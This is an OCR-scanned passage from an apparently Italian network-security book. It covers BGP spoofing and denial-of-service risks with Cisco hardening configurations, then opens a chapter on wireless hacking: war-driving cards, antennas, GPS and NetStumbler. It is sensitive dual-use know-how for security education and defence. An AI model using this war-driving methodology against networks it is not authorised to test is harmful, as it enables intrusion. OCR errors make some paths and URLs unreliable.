ti. Effettuare inoltre il 
monitoraggio dei vicini 
BGP. 


possono essere consta- 
tate modifiche della 
larghezza di banda. 


L'obiettivo di molti attacchi è quello di manipolare il sistema, anziché di ottenere 
l’accesso privilegiato. 


C) Iniezione di pacchetti BGP contraffatti 


Diffusione: 3 
Semplicità: 1 
Impatto: 10 
Fattore di rischio: 3 


Cisco IOS 12.0 e versioni successive consentono agli aggressori remoti di provocare 
il crash del sistema o di introdurre aggiornamenti BGP non formati correttamente; 
per maggiori dettagli, consultare questi database sulle vulnerabilità: 


e http://online.securityfocus.com/bid/2733/info/ 
e http://ww.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0650 


Le vulnerabilità rispetto all’iniezione di pacchetti BGP sono particolarmente peri- 
colose a causa delle penalizzazioni del BGP flapping (“sfarfallamento” delle inter- 
facce BGP) utilizzate dalla maggior parte dei vicini. Si parla di BGP flapping 
quando l’interfaccia di un vicino BGP effettua la transizione da down, a up, poi a 
down e infine ancora a up in un periodo di tempo relativamente breve. Quando 
un sistema BGP smette di funzionare, le informazioni di instradamento cambiano, 
per cui devono essere propagate a tutti i sistemi BGP in ogni parte del mondo. Se 
le modifiche avvengono troppo rapidamente, si possono verificare instabilità nel- 
la tabella di routing globale, con conseguente creazione di incoerenze a livello 
mondiale. 

Per proteggere Internet da questo effetto devastante, sono state implementate al- 
cune contromisure in tutto il mondo. Se un'interfaccia BGP “sfarfalla”, non sarà 
accettata alcuna informazione di instradamento proveniente dalla rete difettosa 
per un periodo di tempo predefinito. Durante questo periodo di tempo, non verrà 
accettato alcun traffico proveniente dai blocchi IP annunciati della rete penalizza- 
ta, per cui si avrà un'interruzione totale. Se un aggressore è in grado di provocare 
ripetutamente il crash di un router, le penalizzazioni del flapping possono provo- 
care un Do$ per un periodo di tempo lungo, con effetti disastrosi. 
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L’iniezione di pacchetti BGP contraffatti è complessa. Sono disponibili unicamente 
due metodi di protezione in grado di contrastare questo tipo di attacco. Quando 
viene attivata una sessione BGP, si crea un numero sequenziale TCP semicasuale. 
Indovinare questo numero, che aumenta continuamente, può risultare difficoltoso; 
ma di norma questo è l’unico metodo per prevenire il possibile danno. La seconda 
misura di sicurezza, l'utilizzo di una password BGP condivisa, è facilmente imple- 
mentabile e rende ancora più difficoltoso questo tipo di attacco. Tuttavia essa viene 
spesso sconsigliata dai fornitori a monte. 

Un “pari” BGP locale ha la possibilità di influenzare la vostra tabella BGP. Questo è 
un privilegio che viene trascurato. Ogni router dispone di una quantità limitata di 
memoria. I pari diretti possono provocare il crash del vostro router iniettando un 
numero eccessivo di instradamenti. Se ogni ip è stato annunciato come /24 (24 bit 
di subnet, più comunemente noti come maschera di subnet Classe C), la maggior 
parte dei router non dispone delle risorse necessarie a popolare una tabella BGP 
costituita da 65.536 voci e si bloccherà, provocheranno un arresto completo, o si 
riavvierà (la qual cosa può provocare il flapping con tutti gli altri vicini). 

Rob Thomas (robt@cymru.com) è il curatore di una delle più popolari guide sul raf- 
forzamento dei sistemi BGP (http://ww.cymru.com/Documents/secure-bgp- 
template.html). È essenziale consultare il suo sito e altri newsgroup per accedere 
a informazioni complete e aggiornate. Segue un sommario di alcune delle principali 
funzionalità che vengono regolarmente trascurate. 


L'utilizzo di questo comando impedirà agli IGP 
di rallentare BGP. 

Impedisce la caduta di sessioni BGP quando i 
keepalive minimi non vengono rilevati. 
Registrate sempre le modifiche ai router, specie 
quelle riguardanti BGP, 


Utilizzate sempre password BGP, anche se il 
provider a monte è contrario 0 i vicini BGP so- 
no connessi direttamente. Questo è semplice- 
mente un esempio di una corretta politica di si- 
curezza. 

Ricordatevi di bloccare la lista dei “megabogus” 
(pacchetti contraffatti; da bogus = fraudolento) 
di Rob Thomas e qualsiasi blocco IP che annun- 
ciate. 


no synchronization 
no bgp fast-external-fallover 
bgp log-neighbor-changes 


neighbor 10.10.10.1 password 


neighbor 10.19.10.1 prefix-list 
filterlist_bogons in 


neighbor 10.10.190.1 prefix-list 
announce out 


neighbor 10.10.10.1 maximum- 
prefix 125000 


access-list 123 permit tcp host 
(bgp peer ip) host (local 
router ip) eq 179 

access-list 123 permit tcp host 
(local router ip) eq bgp host 
(bgp peer ip) 


access-list 123 deny ip any host 


local router ip) log 


Per la sicurezza di altri pari, limitate i vostri an- 
nunci diretti all'esterno ai soli blocchi di cui sie- 
te il proprietario. 

Per proteggere il sistema dall’overflow di me- 
moria, limitate il numero di prefissi accettati. 
L'impostazione di una soglia di avvertimento è 
una buona idea, ma non viene utilizzata in que- 
sto esempio. 


Proteggete le interfacce del router, specie la 
porta BGP TCP. Porre restrizioni su tutto il traf- 
fico destinato al router è una politica di alta si- 
curezza consigliabile, ma potrebbe non essere 
applicabile in ogni tipo di rete. 
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La suddetta lista dei bogus è una lista dei blocchi di indirizzi IP di dimensioni mag- 
giori non annunciati globalmente. Essa per motivi di spazio non sarà inclusa in que- 
sto capitolo. Non c'è alcun motivo per cui gli IP riportati su questa lista debbano es- 
sere considerati una fonte di traffico legittimo. È una buona idea registrare le elimi- 
nazioni dovute ai filtri dei bogus perché questa registrazione può segnalare gli allar- 
mi provocati da un aggressore che esegue client Do$ contraffatti, o da filtri di 
firewall eventualmente difettosi. 

Si consiglia anche la protezione dal BGP flapping per assicurare la coerenza delle 
tabelle BGP. È preferibile ricorrere al dampening bilanciato dei flap in base alla di- 
mensione del prefisso, che non bloccherà eccessivamente reti di grandi dimensioni. 
Ricordatevi di includere specifici blocchi che possono provocare danni se bloccati. 
Per esempio, i blocchi IP dei server root DNS non devono essere bloccati; essi infat- 
ti sono inclusi nel gruppo di interdizione mostrato di seguito (per conoscere il loro 
elenco, consultate il Secure BGP Template): 


ip prefix-list long description Prefixes of /24 and longer. 
ip prefix-list long seq 5 permit 0.0.0.0/0 ge 24 

ip prefix-list medium description Prefixes of /22 and /23, 
ip prefix-list medium seq 5 permit 0.0.0.0/0 ge 22 le 23 
ip prefix-list short description Prefixes of /21 and shorter. 
ip prefix-list short seq 5 permit 0.0.0.0/0 le 21 

route-map graded-flap-dampening deny 10 

match ip address prefix-list rootservers 
route-map graded-flap-dampening permit 20 

match ip address prefix-list long 

set dampening 30 750 3000 60 

route-map graded-flap-dampening permit 30 

match ip address prefix-list medium 

set dampening 15 750 3000 45 

route-map graded-flap-dampening permit 40 

match ip address prefix-list short 

set dampening 10 1500 3000 30Danpening 


Il monitoraggio dei vicini BGP può essere effettuato agevolmente con il seguente 
comando. Ogni eliminazione di una connessione deve essere documentata, La por- 
ta locale di un vicino che ha inviato una richiesta iniziale di sessione cambierà, a se- 
conda di quale vicino si tratti, ma avrà sempre un numero di porta superiore a 1024 
(porta 11001, nell'esempio seguente). La limitazione del traffico basato su questa 
porta è quantomeno una soluzione banale e non è consigliabile: 


CORE#show ip bgp neighbor 69.10.130.125 
BGP neighbor is 69.10.130.125, remote AS 701, external link 
Description: 
BGP version 4, remote router ID 69.10.130.125 
BGP state = Established, up for 130d12h 
Last read 00:00:18, hold time is 180, keepalive interval is 60 seconds 
Neighbor capabilities: 
Route refresh: advertised and received(old & new) 
Address family IPv4 Unicast: advertised and received 
Received 76667371 messages, 0 notifications, Q in queue 
Sent 2351384 messages, 0 notifications, @ in queue 
Route refresh request: received 0, sent 0 
Default minimum time between advertisement runs is 30 seconds 
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For address family: IPv4 Unicast 

BGP table version 2533039, neighbor version 2532932 
Index 1, Offset 0, Mask 0x2 

115504 accepted prefixes consume 4158144 bytes 

Prefix advertised 478764, suppressed 0, withdrawn 307110 
Number of NLRIs in the update sent: max 295, min 0 


Connections established 36; dropped 20 

Last reset 3d12h, due to Interface flap 

Connection state is ESTAB, I/O status: 1, unread input bytes: 0 
Local host: 69.10.130.126, Local port: 11001 

Foreign host: 69.10.130.125, Foreign port: 179 


Per informazioni aggiornate sulla sicurezza delle reti, il BGP e le influenze sull’in- 
stradamento globale potete fare riferimento ai newsgroup elencati nella tabella se- 
guente. 


NANOG http://ww.nanog.org/mailinglist.html 
isp-security http://isp-lists.isp-planet.com/isp-security/ 
isp-routing http://isp-lists.isp-planet.com/isp-routing/ 


cisco-nsp http://puck.nether.net/mailman/listinfo/cisco-nsp 
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Capitolo 10 
Hacking delle reti wireless 


La tecnologia wireless ha fatto il suo esordio negli Stati Uniti più di 60 anni addietro, 
a cavallo tra la prima e la seconda guerra mondiale; tuttavia, dati i timori relativi ai 
rischi per la sicurezza nazionale, essa fu inizialmente destinata solo ad applicazioni 
militari. Attualmente, i computer wireless si stanno diffondendo sul mercato a un 
ritmo vertiginoso; contemporaneamente, e con uguale rapidità, si tende all’esaspe- 
razione tecnologica, si sviluppano nuove funzionalità e nascono sempre nuovi pro- 
blemi di vulnerabilità associati al wireless. Nel 1999 sono stati distribuiti nel mondo 
circa 1,4 milioni di trasmettitori-ricevitori per reti locali wireless (WLAN); appena un 
anno dopo, nel 2000, il loro numero si è quasi quadruplicato, raggiungendo i 4,9 
milioni; inoltre si prevede un'ulteriore crescita fino al 2006, anno in cui è prevista la 
distribuzione di 56 milioni di trasmettitori-ricevitori per WLAN. Questo tasso di cre- 
scita, secondo le recenti previsioni di Allied Business Intelligence, corrisponde a un 
mercato potenziale di 4,5 miliardi di dollari. 

Le reti 802.11 wireless non devono essere confuse con le loro cugine Bluetooth, svi- 
luppate da un consorzio di imprese comprendente tra l’altro Ericsson, Motorola e 
Microsoft. Attualmente, le reti 802.11 trasmettono sulle bande a 2 GHz e 3 GHz, ma 
si sta procedendo allo sviluppo e alla creazione di prototipi in grado di funzionare 
sulla banda a 5 GHz. Visti i tempi di sviluppo relativamente ridotti e date le caratte- 
ristiche della specifica iniziale dei protocolli 802.x e dell'algoritmo WEP (Wired 
Equivalent Privacy), sono stati sviluppati e messi in circolazione numerosi tipi di at- 
tacchi, crack e tool facili da utilizzare, mettendo in difficoltà tali pionieri dell’innova- 
zione tecnologica. 

In questo capitolo, tratteremo dei problemi di sicurezza più importanti, delle con- 
tromisure e delle tecnologie fondamentali sino a oggi identificate e note al pubblico 
nel settore dell'802.11, adottando la visuale della metodologia standard degli attac- 
chi che abbiamo delineato in precedenza nel libro: footprinting, scansione, enume- 
razione, penetrazione e Denial of Service. Poiché le caratteristiche degli attacchi ri- 
guardanti la tecnologia wireless sono piuttosto differenti rispetto a quelle degli at- 
tacchi ai dispositivi cablati, la nostra metodologia includerà le fasi di scansione ed 
enumerazione in un unico sistema compatto. 

Parleremo dei tool e delle tecniche più innovative che gli hacker utilizzano durante 
le loro scorribande di war-driving per identificare reti wireless, utenti e protocolli di 
autenticazione, oltre che delle tattiche di penetrazione per abbattere le difese dei 
dati di autenticazione protetti e per “scassinare” le reti WLAN configurate in modo 
inadeguato. Inoltre, descriveremo numerose configurazioni di fornitori e vari tool 
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third-party, in modo da consentire agli amministratori dei siti di rendere più effi- 
ciente la loro strategia di difesa degli utenti e fortificare le reti wireless a essi affida- 
te. 

AI termine di questo capitolo, sarete in grado di progettare, implementare e utilizza- 
re un moderno sistema di war-driving che consenta di eseguire la maggior parte dei 
tipi di attacchi recenti contro reti wireless, nonché di implementare un'efficace stra- 
tegia difensiva. 


Footprinting in ambiente wireless 


Le reti wireless e i punti di accesso (AP) sono alcuni dei tipi di bersagli su cui è più 
facile ed economico effettuare il footprinting (o il “war-driving”) e dove, ironica- 
mente, il rilevamento di tali attività e le relative indagini risultano più complesse. In 
passato, per praticare il war-driving era sufficiente configurare un laptop, una sche- 
da wireless e un network stumbler (l’utility NetStumbler). Attualmente si tende inve- 
ce a utilizzare configurazioni maggiormente complesse dotate di diversi tipi di an- 
tenne a potenza elevata, schede wireless e dispositivi palmari, tra cui i popolari 
iPAQ e Palm. 

Utilizzeremo il termine “war-driving” in modo generico nel campo della metodologia 
di hacking e del “footprinting”, sottintendendo soprattutto che non è necessario met- 
tersi al volante di un'auto. Potete aggirarvi a piedi in un parco tecnologico, un'area 
del centro, o semplicemente percorrere i corridoi del vostro edificio con il laptop al 
seguito se state effettuando un auditing interno. Il footprinting dei dispositivi wireless, 
in particolare degli AP, ha inizio con la loro localizzazione tramite il metodo passivo 
di ascolto dei broadcast beacon emessi dagli AP, oppure utilizzando un metodo più 
aggressivo, che consiste nel trasmettere client beacon in attesa di risposte degli AP. 
Potete effettuare il footprinting remoto di una WLAN, purché vi troviate a una distan- 
za sufficiente a ricevere o trasmettere beacon e pacchetti dall’/all’AP. Premesso que- 
sto, risultano evidenti i vantaggi che derivano dall'utilizzo di un’antenna migliore di 
quella che generalmente viene fornita con la scheda all’atto dell'acquisto. 

Come vedrete, disporre di un hardware opportuno può risultare determinante ai fini 
del successo del footprinting di una WLAN. Esistono numerosi tipi di schede wireless, 
con diversi chipset. In alcune schede è possibile attivare la modalità promiscua (cioè 
effettuare lo sniffing del traffico), in altre non esiste questa possibilità. Inoltre, alcune 
schede forniscono prestazioni intrinsecamente superiori, poiché supportano diversi 
sistemi operativi. Infine, altri due fattori caratterizzano l'efficacia di un’apparecchiatu- 
ra: la potenza e la direzionalità dell'antenna. Sarà opportuno utilizzare un'antenna 
omnidirezionale se state guidando per strade affollate e un’antenna direzionale se sta- 
te esplorando un determinato edificio, luogo 0 AP. Occorre infine accennare al GPS 
(Global Positioning System). L'aggiunta del GPS alla lista delle vostre apparecchiature 
si rivelerà una soluzione eccellente se desiderate localizzare gli AP, verificarne la por- 
tata in trasmissione e avere la possibilità di ricontrollarli in futuro. 


Apparecchiature 


Oltre al software occorrente, sarà necessario disporre di alcuni tipi di apparecchia- 
ture per effettuare una parte degli attacchi illustrati. Come avrete modo di constata- 
re, le schede wireless, le antenne e i dispositivi GPS sono decisivi per il successo dei 
vari tipi di attacchi e per determinare la distanza alla quale sarà possibile effettuarli. 
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Schede 


Attenzione, le schede wireless non sono tutte uguali. È importante conoscere i re- 
quisiti e le limitazioni delle schede che pensate di utilizzare. Alcune schede causano 
un consumo di corrente superiore, sono meno sensibili e non sono dotate di jack 
per il collegamento di un'antenna supplementare che consenta di avere una portata 
maggiore. Sappiate inoltre che i tempi delle operazioni necessarie per predisporre 
la scheda con particolari sistemi operativi variano notevolmente in base al sistema 
operativo in questione. Se, per esempio, scegliete di utilizzare Linux o BSD, dovete 
ricompilare i kernel con gli opportuni driver pemcia-cs, il che potrebbe non essere 
agevole per chi sia poco esperto di sistemi UNIX. Viceversa, Windows presenta un 
numero notevolmente inferiore di problemi per quanto riguarda la configurazione, 
ma in tale ambiente è disponibile un numero minore di tool, attacchi e tecniche uti- 
lizzabili dalla consolle Win32. 

AiroPeek NX è l’unico sniffer wireless di cui valga la pena parlare a proposito dell’am- 
biente Windows. NetStumbler, un tool che spesso viene erroneamente considerato 
uno sniffer wireless, si limita a effettuare il parsing degli header dei pacchetti wireless 
e utilizza una GUI opportunamente progettata per il reporting in tempo reale dei dati 
di posizione e identificazione degli AP e di qualche altra informazione. L'applicazione 
AiroPeek NX supporta la cattura dei pacchetti tramite 802.11a e 802.11b; essa inoltre 
supporta la navigazione nei canali di nazioni diverse dagli USA, Negli Stati Uniti è sta- 
to stabilito che le reti wireless 802.11 possono utilizzare i canali dall’1 all’11 per le co- 
municazioni; tuttavia in altri Paesi sono comunemente utilizzati anche i canali dal 12 
al 24. Se siete soliti viaggiare di frequente, troverete interessante sapere che AiroPeek 
NX dispone di una caratteristica particolarmente utile: è in grado di supportare tutti e 
24 i canali. Il link mostrato nella tabella consente di accedere a una lista completa del- 
le schede supportate dalla suite AiroPeek NX. 


Compatibilità driver di sniffer http://ww.wildpackets.com/support 
per WLAN Windows /Jhardware/airopeek_nx 


Il sistema operativo maggiormente supportato per quanto riguarda i tool per attac- 
chi wireless, driver e sniffer è di gran lunga Linux. Il mondo di Linux ha investito 
molto tempo e risorse nello sviluppo di una serie di driver PCMCIA (pemcia-cs) 
compatibili con la maggior parte delle versioni dei vari fornitori del chipset 802.11b 
Prism2. Abbiamo già accennato al fatto che occorre compilare questi driver inseren- 
doli nel kernel. 
L'installazione dei driver è piuttosto semplice e incredibilmente simile all’installazio- 
ne della maggior parte delle altre applicazioni e driver basati su Linux. Le istruzioni 
di installazione seguenti sono aggiornate per la versione 3.2.3 dei driver pemeia-cs. 
Ovviamente, qualora sia stata rilasciata una versione successiva e cerchiate di instal- 
larla, dovrete cambiare il numero di versione nelle strutture dei nomi dei file e delle 
directory. Potete scaricare i driver pemcia-cs aggiornati all'indirizzo http: //sour- 
ceforge.net/project/showfiles.php?group_id=2405. 
Di seguito è elencata la procedura per l'installazione. 

1. Estraete con untar i file pemcia-cs-3.2.3.tar.gz, memorizzandoli in 

/usr/sre. 


2. Eseguite make config in /tsr/sro/pemcia-cs-3.2.3/. 
3, Eseguite make all da /tusrsro/pemceia-cs-3.2.3/. 
4. Eseguite make install da /usr/sro/pemcia-cs-3.2.3/ 
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Dovrete probabilmente personalizzare il vostro script di startup e i file delle opzioni 
contenuti nella directory /etc/pcmcia in funzione della vostra WLAN, della configu- 
razione del sistema, o del tipo di rete da colpire. 

Troverete certamente i driver occorrenti per la scheda con una rapida ricerca su Go- 
ogle.com; in ogni caso, la tabella seguente elenca alcuni dei siti migliori cui accede- 
re per scaricare i driver per la vostra scheda wireless per Linux. Come si vede, essi 
sono divisi per chipset. 


Orinoco http://airsnort.shmoo.com/orinocoinfo.html 
Prism2 http://www.linux-wlan.com/linux-wlan/ 
Cisco http://airo-linux.sourceforge.net/ 


Si presenta un ultimo problema (ultimo ma decisamente non meno importante): 
quello dei driver per tutti gli utenti che prediligono il nuovo kernel OpenBSD sui 
laptop Mac (o su qualsiasi altro laptop su cui sia caricato OpenBSD). Il kernel di 
OpenBSD è molto simile a quello di Linux per quanto riguarda le procedure occor- 
renti per configurare e far funzionare il sistema in una modalità wireless, in partico- 
lare nella modalità wireless promiscua. Di seguito viene segnalato un buon link a 
un sito da cui è possibile accedere a driver e altre informazioni sui tool BSD. 


Driver wireless OpenBSD http://ww.dachbQden.com/projects/ 
source -mods.html 


Antenne 


Sappiate che l'individuazione e installazione del tipo più opportuno di antenna può 
rivelarsi il compito più impegnativo nella messa a punto della vostra apparecchiatu- 
ra per il war-driving. Dovete per prima cosa decidere a quale tipo di war-driving vi 
dedicherete (Figura 10.1). Opererete in una metropoli quale New York, Boston 0 
San Francisco, o magari intendete esplorare un’area meno popolata? Occorre valu- 
tare questi fattori prima di decidere quale antenna verrà utilizzata. 


Figura 10.1 
Tipiche antenne per war-driving, 


Cri ino 
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Per comprendere a fondo le differenze tra i vari tipi di antenne, sono necessarie al- 
cune nozioni di base sulla tecnologia delle antenne. Il primo concetto da compren- 
dere, quello più importante, è la direzionalità dell'antenna; da questo punto di vista, 
le antenne possono essere classificate in tre tipi: direzionali, multidirezionali e om- 
nidirezionali. In genere, le antenne direzionali sono utilizzate quando si comunica 
con aree specifiche e non risultano particolarmente efficaci per il war-driving (qua- 
lora stiate effettivamente guidando un'auto). Viceversa, le antenne direzionali sono 
quelle più efficaci nel caso della cattura dei pacchetti a lunga distanza, poiché la po- 
tenza e le onde radio sono focalizzate in un’unica direzione. Le antenne multidire- 
zionali sono simili a quelle direzionali: in entrambi i casi si utilizzano fasci di onde 
notevolmente concentrati. Generalmente, le antenne multidirezionali sono bidire- 
zionali (configurazione fronte-retro) o quadrangolari; di solito la loro portata, a pa- 
rità di potenza, è alquanto inferiore rispetto alle antenne unidirezionali, poiché la 
potenza viene ripartita in varie direzioni. Infine, le antenne omnidirezionali sono 
quelle che corrispondono maggiormente all'idea che si ha in genere di un'antenna. 
Un’antenna omnidirezionale è quella più efficace nel war-driving nei centri urbani, 
poiché trasmette e riceve segnali in/da tutte le direzioni, assicurando in questo 
modo la massima copertura angolare. Un esempio di antenne omnidirezionali è co- 
stituito dalle antenne per le autoradio delle autovetture. 

Ora che conoscete la terminologia relativa alle antenne direzionali, è opportuno che im- 
pariate a conoscere alcuni tipi di antenne comuni e a distinguere una buona antenna da 
una scadente. Un altro termine del mondo wireless, “guadagno”, è utilizzato per descri- 
vere l'energia irradiata da un’antenna con il fascio focalizzato in una determinata dire- 
zione. Per tutte le antenne dei trasmettitori-ricevitori si parla di guadagno in almeno due 
direzioni: la direzione in cui inviano dati e la direzione in cui li ricevono. Se intendete 
comunicare su lunghe distanze, dovete scegliere un'antenna con un fascio molto con- 
centrato e a guadagno elevato; se, viceversa, la distanza è minore, la vostra scelta dovrà 
cadere su un'antenna con un fascio disperso e a basso guadagno (omnidirezionale). 
Pochissime antenne sono completamente monodirezionali, poiché queste servono ge- 
neralmente per le comunicazioni tra due dispositivi entrambi fissi. Un esempio diffuso 
di antenna monodirezionale è quello costituito da un ponte radio per le comunicazioni 
tra due edifici. Un’antenna yagi è costituita da una combinazione di piccole antenne 
orizzontali, che consente di ottenere un fascio maggiormente focalizzato. Un'antenna 
patch o a pannello antenna dispone di un fascio ampio, correlato direttamente alle di- 
mensioni del pannello; essa è costituita da una superficie planare: la potenza viene 
quindi concentrata in un’unica direzione. La parabola è un altro tipo di antenna utilizza- 
bile, ma è adatta unicamente ai dispositivi che devono trasmettere in un sola direzione, 
poiché la parte posteriore della parabola non è l'ideale per trasmettere o ricevere segna- 
li. Per fini pratici, vi sarà probabilmente molto utile un'antenna omnidirezionale con un 
angolo di copertura ampio e basso guadagno, che sia facilmente collegabile alla scheda 
wireless e che non richieda un alimentatore supplementare. 

Esistono numerosi fornitori e distributori che dispongono di apparecchiature appropria- 
te per il war-driving. Riportiamo i nomi di alcune delle aziende da noi preferite, ciascu- 
na delle quali è in grado di fornire alcuni degli elementi che vi occorrono; occorre però 
segnalare che Wireless Central è famosa per i suoi “sistemi completi per war-driving® e 
HyperLinkTech è rinomata per le sue antenne ad alta potenza e lunga portata. 


HyperLinkTech http://ww.hyperlinktech.com 
Wireless Central http://ww.wirelesscentral.net 
Fleeman, Anderson, and Bird Corporation http://www.fab-corp.com/ 
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GPS 


Un GPS nel mondo wireless è l'equivalente di un tool o un'applicazione di mapping 
utilizzata nelle valutazioni delle reti cablate (vedi Figura 10.2). La maggior parte dei di- 
spositivi GPS interagisce con il software per war-driving tramite raffronti degli indica- 
tori data e ora. Il software del GPS effettua una registrazione in tempo reale della posi- 
zione del dispositivo in un semplice file di testo, associando le coordinate (longitudi- 
ne e latitudine) con gli indicatori data e ora corrispondenti. Questi file di testo sono fa- 
cilmente importabili in diversi software di mapping, utilizzabili per creare accurate 
mappe a colori dei punti di accesso identificati e dei rispettivi raggi di copertura. 


Figura 10.2 
Unità GPS. 


Le unità GPS sono relativamente facili da acquistare e installare sul laptop, specie se 
siete utenti Windows. Esistono numerosi fornitori e la maggior parte dei dispositivi 
disponibili sono relativamente simili dal punto di vista delle tecnologie incorporate 
al loro interno. Le differenze principali tra prodotti offerti da diversi fornitori riguar- 
dano l’aspetto esteriore e il software fornito in dotazione a tali prodotti. I migliori 
software sono caratterizzati dalla presenza di un numero soddisfacente di mappe di 
zone rurali e delle periferie della città, di cartine stradali aggiornate e, cosa più im- 
portante, di un’eccellente algoritmo per il calcolo della direzione. Tutte queste ca- 
ratteristiche risulteranno preziose quando cercherete di definire gli itinerari di war- 
driving per essere certi di non percorrere la stessa strada, nonché quando eseguire- 
te il mapping di aree molto vaste. 

L'installazione dei driver e dell'unità GPS è relativamente semplice; tuttavia, occorre 
segnalare alcuni aspetti. Con le vostre apparecchiature dovete decidere la meta e le 
modalità con cui effettuerete il war-driving. Per esempio, in genere occorre un cavo 
seriale per il collegamento del GPS al laptop; inoltre, come vi accorgerete, le unità 
GPS riescono a localizzare con maggiore velocità e precisione l’obiettivo se non ci 
sono ostacoli tra l’apparecchiatura e il cielo. Per i fortunati lettori che dispongono di 
una spider o una jeep questo non rappresenta un problema; tutti gli altri potranno 
acquistare un cavo di lunghezza sufficiente da consentire di appoggiare l’unità GPS 
sul cruscotto dell’auto, o fissare all'unità un magnete e ancorarla al tetto. 
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[= Non dimenticate che un'unità GPS si rivelerà scarsamente utile se, tanto 

Ro per cominciare, la vostra scheda wireless non assicura una portata suffi- 

ciente. Se avete intenzione di investire il vostro tempo, le vostre energie e i 

vostri risparmi in un sistema per war-driving, dotato anche di un software 

di mapping GPS, è quindi opportuno che acquistiate un'antenna di buona 

qualità. Nel paragrafo precedente, sono state fornite informazioni detta- 

gliate e specifiche sulle antenne e sulle loro caratteristiche, nonché su altre 
peculiarità del war-driving. 


Come nei paragrafi precedenti, elenchiamo i nostri fornitori di apparecchi GPS pre- 
feriti. Sappiamo che esistono molti altri fornitori, ma consigliamo di rivolgervi a 
quelli segnalati nella tabella seguente, in quanto dispongono di prodotti unici (per 
esempio la linea Magellan di dispositivi GPS). Al termine del capitolo, sarete in gra- 
do di progettare, implementare e utilizzare correttamente un sistema di war-driving 
all'avanguardia che anche i vostri amici vi invidieranno (questo almeno è il nostro 
obiettivo). 


Garmin International http://ww.garmin.com/ 
Magellan http://www.magellangps.com/ 


Software per war-driving 


La messa a punto del software per war-driving può rivelarsi alquanto più complessa 
a causa delle difficoltà connesse all’installazione dell'hardware e del software, a cui 
abbiamo già accennato. Poiché il software per war-driving richiede la presenza di 
un'unità GPS che consenta di individuare la posizione del laptop da parte dell'AP, 
nonché l’utilizzo di software di identificazione degli AP, la messa a punto può rive- 
larsi impegnativa. Tuttavia, la capacità di un sistema di war-driving di utilizzare 
un'unità GPS è una delle caratteristiche maggiormente utili, per il semplice motivo 
che consente di eseguire la mapping di AP vulnerabili da utilizzare in futuro, o di 
individuarli per fortificarne in seguito le difese. 

La tecnologia wireless (come la maggior parte delle tecnologie) prevede l’utilizzo di 
sigle; occorrerà quindi imparare alcuni termini semplici prima di entrare nel vivo di 
questo paragrafo e della parte restante del capitolo. Le sigle in questione sono: 
SSID, MAC e IV. Il SSID (Service Set Identifier) è un identificatore che consente di 
distinguere un punto di accesso dall'altro (0, su scala più vasta, un’organizzazione 
dall’altra); esso può essere considerato come l'equivalente del nome di dominio per 
le reti wireless. L'indirizzo MAC (Media Access Control) è l’indirizzo specifico che 
identifica ciascun nodo di una rete. Nelle WLAN, può essere utilizzato come fonte 
per il controllo degli accessi dei client. L'IV (nitialization Vector) di un pacchetto 
WEP (Wired Equivalent Privacy) viene inserito dopo l’header 802.11 e utilizzato in 
combinazione con la chiave segreta condivisa per criptare i dati dei pacchetti. 
NetStumbler, la prima applicazione per il war-driving messa a disposizione del pubbli- 
co, fu rilasciato come tool che analizzava i due campi dell’header 802.11 e IV dei pac- 
chetti wireless, al fine di individuare l'SSID, l'indirizzo MAC, l'eventuale implementa- 
zione del WFP, la lunghezza della chiave WEP (40 o 128 bit), la portata del segnale, e, 
potenzialmente, il fornitore del punto di accesso. Non molto tempo dopo, fecero la 
loro comparsa alcuni tool per Linux e UNIX che utilizzavano tecniche simili ma con- 
sentivano anche di eseguire il crack delle chiavi WEP e degli stessi dati dei pacchetti. 
La maggior parte di questi tool si basava sulla scoperta, fatta da Tim Newsham, della 
possibilità di sfruttare i punti deboli delle chiavi presenti nell’algoritmo WEP e nell’al- 
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goritmo di pianificaione delle chiavi (KSA). Alcuni dei tool per war-driving più diffusi 
sono elencati di seguito. Ciascuno di essi dispone di caratteristiche diverse; pertanto, 
ciascuno presenta una caratteristica unica che potrebbe rivelarsi utile. 


LC) NetStumbler 


Diffusione: 9 
Semplicità: D 
Impatto: 9 
Fattore di rischio: s 


NetStumbler (http://www. netstumbler.com/) è un tool per war-driving basato su 
Windows, in grado di rilevare reti wireless e contrassegnarne la posizione relativa 
con un GPS. NetStumbler utilizza una Probe Request 802.11 inviata all'indirizzo di 
destinazione trasmesso, che forza tutti i punti di accesso presenti nell’area a emette- 
re una Probe Response 802.11 contenente informazioni sulla configurazione della 
rete, quali i SSID e lo stato WEP. Quando è connesso a un GPS, NetStumbler regi- 
stra le coordinate GPS corrispondenti alla massima intensità del segnale rilevata per 
ciascun punto di accesso. Utilizzando i dati di rete e quelli GPS, è possibile creare 
mappe con tool quali StumbVerter e Microsoft MapPoint. NetStumbler supporta le 
schede con chipset Hermes su Windows 2000; tra queste, le più diffuse sono quelle 
targate Orinoco di Lucent (attualmente Proxim). Su Windows XP la libreria di reti 
NDIS 5.1 dispone di funzionalità 802.11, che consentono di utilizzare NetStumbler 
con la maggior parte delle schede supportate. 

Per utilizzare NetStumbler, dovete inserire la scheda wireless e impostare il vostro 
SSID o il vostro nome della rete su ANY. Nel caso delle schede Orinoco, queste op- 
zioni si trovano nell’utility Client Manager, come mostrato nel prosieguo del capito- 
lo. Se NetStumbler non rileva i punti di accesso che sapete essere presenti, effettua- 
te questo controllo per prima cosa prima di passare ad altre attività diagnostiche. 
L'impostazione del campo Network Name su ANY indica al driver di utilizzare un 
SSID di lunghezza 0 nelle sue Probe Request. Di default, la maggior parte dei punti 
di accesso risponderà a Probe Request contenenti il loro SSID o un SSID di lunghez- 
za 0. 
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Una volta che la scheda è stata configurata in modo corretto, avviate NetStumbler 
e fate clic sulla freccia verde presente sulla barra degli strumenti (se non è stata 
già selezionata). Se nell’area in questione sono disponibili punti di accesso pro- 
grammati per rispondere a una Broadcast Probe Request, essi risponderanno e sa- 
ranno visualizzati nella finestra. 

Potete utilizzare l'opzione Filters per catalogare rapidamente diverse reti in base a 
criteri quali l'utilizzo eventuale del WEP o il fatto che la rete sia di tipo IBSS oppu- 
re di tipo BSS. Poiché una rete IBSS Undependent BSS) è un gruppo di sistemi che 
operano senza un punto di accesso, a differenza di una rete BSS, un aggressore 
sarà in grado di accedere unicamente ai sistemi presenti in tale rete e non utilizze- 
rà necessariamente la rete wireless come ponte mediante il quale penetrare nella 
LAN interna. 

La selezione di una qualsiasi delle reti mediante la sua icona a forma di cerchio 
consente inoltre di visualizzare un grafico del rapporto segnale/rumore (Figura 
10.3). 
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Figura 10.3 
NetStumbler. 
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© Contromisure a NetStumbler 


